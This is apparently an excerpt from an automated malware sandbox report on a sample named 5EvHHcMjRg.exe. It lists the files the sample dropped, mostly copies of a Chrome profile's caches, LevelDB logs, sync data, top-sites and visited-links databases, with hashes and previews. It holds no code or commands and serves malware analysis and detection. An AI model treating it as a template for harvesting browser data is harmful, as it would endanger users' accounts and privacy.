C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_3

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\index

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	0.0011594133267966273
Encrypted:	false
SSDEEP:	3:LstlNllkll/l+A:LsX3lEt+A
MD5:	2A1355D2E4A01C9668CBACED5B1F00FC
SHA1:	DA7633F2DC10673B63924317E4EDC40E968543D5
SHA-256:	DA134FDCC1378DC5268A498876BECBF9C4610F109E128470CF06A59EE27ECCB8
SHA-512:	95035E746032E1FAB297899242965AD5EE57CD4998AA18A8EC236654C7A676BDC00ED976ECC09E690B3F9E9F247E30897C8DE99ACCB9A29743C08E2FE16B283E
Malicious:	false
Preview:	.........................................ED.de/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	389
Entropy (8bit):	5.124818435842201
Encrypted:	false
SSDEEP:	12:k9yVMIf5KkkGHAruFLkyVJL+vYf5KkkGHArBFUv:dVMIf5KkkGgeLlVJYYf5KkkGgP2
MD5:	6F251862201426673E37E7B23D741C07
SHA1:	D6B451D11205BAF64B84E73D6FD821C2B17E82F4
SHA-256:	1B698D81F299D0C83F827404661F73DB29B116153A11727C95198B3A4B97FFB9
SHA-512:	304424201BD110FDC6CD5204631DE3673DAF78A1B3D40CE6C512B6B95B8DFA1ED384CA7B5F2F45FAF17D4C02DC3FC1F4978C174ADD2E3D5FDE14154260DB9A6B
Malicious:	false
Preview:	2023/10/03-12:50:02.905 105c Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb since it was missing..2023/10/03-12:50:02.911 105c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Network Persistent State

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Reporting and NEL

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.5559635235158827
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
MD5:	9AAAE8C040B616D1378F3E0E17689A29
SHA1:	F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
SHA-256:	5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
SHA-512:	436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Trust Tokens

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.36515621748816035
Encrypted:	false
SSDEEP:	24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:	25363ADC3C9D98BAD1A33D0792405CBF
SHA1:	D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:	6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:	CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.7273991737283296
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
MD5:	9F7EADC15E13D0608B4E4D590499AE2E
SHA1:	AFB27F5C20B117031328E12DD3111A7681FF8DB5
SHA-256:	5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
SHA-512:	88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
Malicious:	false
Preview:	*...#................version.1..namespace-..&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.098220510456623
Encrypted:	false
SSDEEP:	6:k941TRq1wkn23iKKdKkGckArZQM72KLli41LPL+q2Pwkn23iKKdKkGckArZQMxIg:k9y7f5KkkGHAr9LkyLPL+vYf5KkkGHAt
MD5:	D5B077554B5C9DD96EB221363F2596F7
SHA1:	06A9C955E2756A587E32D94464FC045B1A922ABD
SHA-256:	2C2216F761A4F79E2E237FA18895E67AC5248F3B000382FFEEAC802461F32F7F
SHA-512:	17477FA9F172842E6897DB93023B4C641DFAF193B8855EE264E4977E2F73B4761DF1A9BE0A31D3F2D8E116D020A9D72199C177E365729ED6A739557DA8DC1BE6
Malicious:	false
Preview:	2023/10/03-12:50:18.021 105c Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage since it was missing..2023/10/03-12:50:18.028 105c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\000003.log

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	8912
Entropy (8bit):	5.9361017364428355
Encrypted:	false
SSDEEP:	192:HCXfxOnZxcQwLwRXxHqEx+xxQ4XwLwRXxPWSZGqExcA0fx4FvxxsinZxHixsHs5Q:HCXfsnZeQQaX1BgxS4XQaXzZGBr0fOxX
MD5:	B7D1B853829B2369E62F0DB31503D513
SHA1:	A704A2918C39FB7CC416A0FAC283FB5D26918F34
SHA-256:	24F8A06FB9F3D961483FB086EA605A82ED7DEAEAD4AFB65D68471FE80F7C813E
SHA-512:	9B60FBCAC4ADECF66B38BCDE90ED2BDB7B660BEECD483A434AE8CACF5660A08DF3327985A85B287A35EEF13EAF98D870315865E9F4AF4F9794D588AB1FE549D4
Malicious:	false
Preview:	...n'................_mts_schema_descriptor...U...z...............,web_apps-dt-fmgjjmmmlfnkbppncabfkddbjimcfncm...x.2https://mail.google.com/mail/?usp=installed_webapp..Gmail...https://mail.google.com/mail/J.mail/?usp=installed_webapp..Gmail".(.2.https://mail.google.com/mail/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X.........1..........................C...=https://mail.google.com/mail/installwebapp?usp=chrome_default.............\|{................,web_apps-dt-mpnpojknpmmopombnjdcgaaiekajbnjb......6https://docs.google.com/document/?usp=installed_webapp..Docs..!https://docs.google.com/document/J.document/?usp=installed_webapp..Docs".(.2!https://docs.google.com/document/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X.........1..........................G...Ahttps://docs.google.com/document/installwebapp?usp=chrome_default...........v.7.t...............,web_apps-dt-aghbiahbpaijignceidepookljebhfak...V. https://drive.google.com/?lfhs=2..Google Drive..*.https://drive.google.com/J.?lfhs=2..Google D

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.238616004012761
Encrypted:	false
SSDEEP:	6:k+VyEcM+q2Pwkn23iKKdKpIFUtPVyEJZmw1VyEcMVkwOwkn23iKKdKa/WLJ:kqypM+vYf5KkmFUttym/fypMV5Jf5Kk7
MD5:	7CB7FD259871A3A6C758FE760F0705FA
SHA1:	3E89D23FAE8AAB72852D61C5A06D326F87B5421C
SHA-256:	D72490A732A0EE9608BC5D01641C64FD3405D7B56E8208EAE082220DC8F9B9D7
SHA-512:	BC49590FC4A04B129A1137358BDAE5EC2C2E5EF7A3B379907E9858623C06E3F04D574A3AED73E55F88FB1E9664ACA738C11E10987C21C206E0A6765222257792
Malicious:	false
Preview:	2023/10/04-12:01:07.576 18fc Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/04-12:01:07.576 18fc Recovering log #3.2023/10/04-12:01:07.576 18fc Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG.old

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.172000252492465
Encrypted:	false
SSDEEP:	6:k+VAHN+q2Pwkn23iKKdKpIFUtPVAHZZmw1VAHNVkwOwkn23iKKdKa/WLJ:kqAovYf5KkmFUttA5/fAT5Jf5KkaUJ
MD5:	2E630976EAAE1F81B131DDCBAD041ED2
SHA1:	11F08862FB22EE755E9F13E9B6ED5E10214560FA
SHA-256:	842A5FBC9CE3F9FF597A49E6A3103D78A9D02809D23499D2011398A56332DA52
SHA-512:	9350CAF5E401E1714B71AE6B736FC99E68F9932CB2A169F457E194525050FA4F3A197315F02B86D11E1ED65C9E4457347DD4CBC92992F69A3B03043A7A874778
Malicious:	false
Preview:	2023/10/04-12:01:05.433 1518 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/04-12:01:05.433 1518 Recovering log #3.2023/10/04-12:01:05.433 1518 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Top Sites

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.37202887060507356
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
MD5:	4D950F6445B3766514BA266D6B1F3325
SHA1:	1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
SHA-256:	765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
SHA-512:	AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Visited Links

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.011082652943068889
Encrypted:	false
SSDEEP:	3:ImtVdTG+ndNrlTqG//3MYRpyOevHKdYHzt/QLXt/hutll8U:IiV/w2sKYzo6l6
MD5:	28A382373B59F45BDE98D472E9FB3DB6
SHA1:	1B8ECDB08D77F657A3838EA06E80A87B64949B47
SHA-256:	7B7E3E969C7CBBDE1E99D2C14099AE9FCD6F63E48DA11D9D96035885AB7B9604
SHA-512:	6B82F0D8F5EADFA7D8B2FF591201C70F56266D0AE7F79777FBD0E042ADA9E92F9BF66FFBE23C0986950E00F38417111CD5F2E2849EEF232313DCDBF09D748D3C
Malicious:	false
Preview:	VLnk.....?.......c...(D................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
Category:	dropped
Size (bytes):	170408
Entropy (8bit):	4.700736115175864
Encrypted:	false
SSDEEP:	768:JGMkerPbmDFFwAkpeaWCSj8BbUZh5g2i4GhuPD23W1qG+WflTnKM1+Oug7S1ws17:JTTLexkpDWnIwqDYL2G1xD3hC92WdH1N
MD5:	11EB9052FA3E4755FFC9E2E718429CB5
SHA1:	6ADE41E280A7C5B3DD48228189BE3D6724BED1B4
SHA-256:	F1894DCF1859D4D0EA121BAE0C0976F368DB4ACBE30CBAF3B1836F03FA431B16
SHA-512:	E33733FCAEC08300CB004767379F0470582ECAD55D755937A2919B03FAAD5333987C74D33E1819A57311CED57AEC22242AA08EA6FCB73D350B342576982078C4
Malicious:	false
Preview:	............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..L...M..(............. ...............................F...G6..>1..D1..B6.. ......7...l ...B...C...A...E.dN.. ....t...t...\|0...H...3.q..$S../[.].1sY.5.U.3...Y..............r....P.3.Z.;.X.#}....................R./AX.7.N.*............A............R.7.G...(.`.....................<...9..Z9..Z..q.........................................(............. ...................................N..0..w3..w3..@..................l.a..>...E...A...D...:..g.5H.`.....P. .a...p%...F...G...I...8.~T..+5..M....."...#..."..9...G...9...z..p..%r.."u..D.4@J.6.M.6.E.2........................?....W.2.X.5.Y.9.f..U...a....................N.'.T.5.U.5.R.0.............................R.2vY.;.E.....\|........u.....U..........@. .N...:...6............................... p..:..5:..5<i................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	Non-ISO extended-ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:zVZum:5x
MD5:	AEC0EF4D4CEFA7D6057327E4A8CA69A3
SHA1:	1B69876DEC8A9EE8DC35842708EACF73D323266B
SHA-256:	47075E9D8C3B5977D8D52C16AC3D5170D952179E85DB30187956C8413D35F423
SHA-512:	408C3910E44E2A1CD1DADD3F637CD49DB0DE252E71621747AD999790D2D77723373237199C8D2ACA771E1926C64D0A561823C51C04EB4B05832991F4690B0505
Malicious:	false
Preview:	..............f

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
Category:	dropped
Size (bytes):	176153
Entropy (8bit):	5.269245949919283
Encrypted:	false
SSDEEP:	3072:tNjOVz1os/Icu/zejqqqqqIqqnqqvqqzFW3qvOkY6KOHiq0ZPqckQcqjc1+ahORL:tVOVzd/IUjqqqqqIqqnqqvqqzFW3qvOz
MD5:	01A9608FA54A2550EA90ED0A63888D58
SHA1:	4C3BC533FDF109625BFCCA07DF8F6CD0A4A42836
SHA-256:	168C206845754DB457AAEF9117F1FA12DC774F1B75502F0DF2FF3FBD695968C1
SHA-512:	99B14E517AEF86277141A9A9FE34DD44158DD3FEA825B66EE940F0B188F12CE83137A0BC42FCB7F8DC348A3E1BD1B50E655B2B1AC1EC22444165B6A22091C526
Malicious:	false
Preview:	............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..b...M..(............. ......................................................... .g"..(..&......$...#..".i#,..%...%...$........&...&..."..&0..&/..!..............$...#..)2..(1..#-.........."+...%...$..,5..,6..+5..(2.......)...)...$..18.h.8.)3.&1..2..#,. ..'.h................................................................(............. .................................................................. ..!+.^.(.s.(.y.).\|.%.}.$.z.!.s.#.`...."+..$/..#-.. +...$..",...)...%...%..."..$...%-..!..,4..AI.......!...&...#..."..%/..&0.. ..5>..........7A..."...%..."..(1..(2..!+..6?..........8A...#...%..."..+4..3..&/..09..BJ.......$...)...%...#../9..0:..,6..(2..!,..)2..$... +...)...&..5@..2:.`,7.s,4.z.6.{'2.{&..z#,.s#-.`.)............................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:blAmn:blAmn
MD5:	467AA32B073890152C542DCF88545EB4
SHA1:	91ACA28632A8EF9B91626342FFED20C60C7AA3F5
SHA-256:	29EF0A4FBA615380CAF09AF9228D7E8A191AAA817655AB7E894C9496FE0BA4D6
SHA-512:	48A1C21AD5CE15EA88A91D3B42F2DDA867A6714CD72AFDE05BC6F7FA6BD4DACDFE4ACE62812037AFD6122A9E3455E178418BE80BBCE631D80C4788A83DFB6C57
Malicious:	false
Preview:	..m..R...u%.P

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
Category:	dropped
Size (bytes):	156005
Entropy (8bit):	3.9419007592660393
Encrypted:	false
SSDEEP:	1536:3zDNlXnPsf/d/Gn+E9rdL9rdL9rdL9rdL86tw:1+Un+E9rdL9rdL9rdL9rdL86tw
MD5:	B6222BE0D5F8AB18FA104FC1D88E3824
SHA1:	4EFF5078405F357FD2E4C866060D4115B02F7484
SHA-256:	387133071D04972F74F0722F2EA05F672E15176C2D0907B17F1804EACF886B00
SHA-512:	8BF5FA4FED13F02469F9B59CB979E5499761F8D338B48C6666F8DD4686DDECD840A467DC4EB55290535C949E8099A596513C860F9AAAD231832DC1202CE580C5
Malicious:	false
